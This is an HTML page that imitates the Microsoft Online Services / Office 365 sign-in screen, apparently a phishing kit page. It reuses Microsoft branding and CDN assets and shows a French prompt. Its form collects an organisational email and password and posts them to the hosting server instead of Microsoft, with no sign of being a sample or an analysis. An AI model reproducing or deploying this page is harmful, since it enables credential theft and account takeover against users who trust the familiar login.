<html>
<head>
	<title>Sign in to Microsoft Online Services</title>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes"/><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta name="PageID" content="i5030.2.0"/><meta name="SiteID" content="10"/><meta name="ReqLC" content="1033"/><meta name="LocLC" content="1033"/><meta name="mswebdialog-newwindowurl" content="*"/>
	<link href="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/images/favicon_a.ico" rel="SHORTCUT ICON" />
	<link href="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/css/login.ltr.css" rel="stylesheet" type="text/css" /><script src="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/js/jquery.1.5.1.min.js" type="text/javascript"></script><script src="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/js/aad.login.js" type="text/javascript"></script><script src="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/js/jquery.easing.1.3.js" type="text/javascript"></script>
	<style type="text/css">body {
            display: none;
        }
	</style>
</head>
<body><script>
        if (self == top) {
            var body = $('body');
            body.css('display', 'block');
        } else {
            top.location = self.location;
        }
    </script>
<div class="ie_legacy" id="background_branding_container" style="background: #FFFFFF"><img alt="Illustration for Microsoft Online Services" id="background_background_image" />
<div class="background_title_text" id="background_company_name_text">&nbsp;</div>
</div>

<div class="overlay ie_legacy" id="background_page_overlay">&nbsp;</div>

<div class="login_panel" id="login_no_script_panel">
<table class="login_panel_layout" style="height: 100%;">
	<tbody>
		<tr class="login_panel_layout_row" style="height: 100%;">
			<td id="login_panel_left">&nbsp;</td>
			<td id="login_panel_center">&nbsp;</td>
			<td id="login_panel_right">&nbsp;</td>
		</tr>
	</tbody>
</table>
</div>

<div class="login_panel" id="login_panel">
<table class="login_panel_layout" style="height: 100%;">
	<tbody>
		<tr class="login_panel_layout_row" style="height: 100%;">
			<td id="login_panel_left">&nbsp;</td>
			<td id="login_panel_center"><!--office365 logo--><script type="text/javascript">
                        $(document).ready(function() {


                            Constants.DEFAULT_LOGO = 'https://secure.aadcdn.microsoftonline-p.com/aadbranding/1.0.1/aadlogin/Office365/logo.png';
                            Constants.DEFAULT_LOGO_ALT = 'Sign in';
                            Constants.DEFAULT_ILLUSTRATION = 'https://secure.aadcdn.microsoftonline-p.com/aadbranding/1.0.1/aadlogin/Office365/illustration.jpg';
                            Constants.DEFAULT_BACKGROUND_COLOR = '#EB3C00';

                            Context.TenantBranding.workload_branding_enabled = true;
                            User.UpdateLogo(Constants.DEFAULT_LOGO, Constants.DEFAULT_LOGO_ALT);
                            User.UpdateBackground(Constants.DEFAULT_ILLUSTRATION, Constants.DEFAULT_BACKGROUND_COLOR);
                            Context.TenantBranding.whr_key = '';
                            jQuery('img#logo_img').attr('src', '');
                            Context.use_instrumentation = true;
                            User.moveFooterToBottom('250px');
                        });
                    </script>
			<div class="login_inner_container">
			<div class="inner_container cred">
			<div class="login_workload_logo_container">&nbsp;</div>

			<div class="login_cta_container normaltext">
			<div class="cta_message_text 1" id="login_cta_text">Connectez-vous avec votre compte d'organisation</div>
			</div>

			<ul class="login_cred_container">
				<li class="login_cred_field_container">
				<div class="login_textfield textfield" id="cred_userid_container"><span class="input_field textfield"><label class="no_display" for="UsernameForm">User account</label> </span>

				<div class="input_border">
				<form action="" autocomplete="off" method="POST" name="LoginForm"><br />
				<span class="input_field textfield"><input class="login_textfield textfield required email field normaltext" name="UsernameForm" placeholder="someone@example.com " tabindex="1" type="text" /><br />
				<br />
				<input aria-label="Password" class="login_textfield textfield required field normaltext" name="password" placeholder="mot de passe" tabindex="2" type="password" /><br />
				<br />
				<br />
				<input class="button normaltext cred_sign_in_button refresh_domain_state" type="submit" value="Connexion" /> </span></form>
				</div>
				<span class="input_field textfield"> </span>

				<div class="login_textfield textfield" id="cred_password_container"><span class="input_field textfield"><span class="input_field textfield"><label class="no_display" for="PasswordForm">Mot de passe</label> </span></span>

				<div class="input_border">&nbsp;</div>
				<span class="input_field textfield"><span class="input_field textfield"> </span> </span></div>
				<span class="input_field textfield"> </span>

				<div class="no_display" id="cred_hidden_inputs_container"><span class="input_field textfield"><input id="PPSX" name="PPSX" type="hidden" value="PassportRN" /> <input id="i0327" name="PPFT" type="hidden" value="A1F6YNWGa2YkRUNNhPfW3T8PcqsjHEeiQmp*m*wFwPyxag08*cPrW*SpZSnKeqiDJI*EUu8ceb42zjM89!r*ck!Q6kkHvZYoRPC53LwqFG6O6YCE5yI3mHRGLjK6BurKT332TUIqbZPBSJiw!cfoJN2PCje1NESa7hs4mIzcHNmkN7DO0RJOeoWX8r1DK*UBFpxFwOw$" /> </span></div>
				<span class="input_field textfield"> </span></div>
				</li>
				<li class="login_cred_options_container">
				<div class="subtext normaltext" id="cred_kmsi_container"><span class="input_field "><input id="cred_keep_me_signed_in_checkbox" name="persist" tabindex="10" type="checkbox" value="0" /> <label class="persist_text" for="cred_keep_me_signed_in_checkbox" id="keep_me_signed_in_label_text">Rester connecté</label> </span></div>
				</li>
			</ul>
			</div>
			</div>
			</td>
		</tr>
	</tbody>
</table>
</div>
</body>
</html>
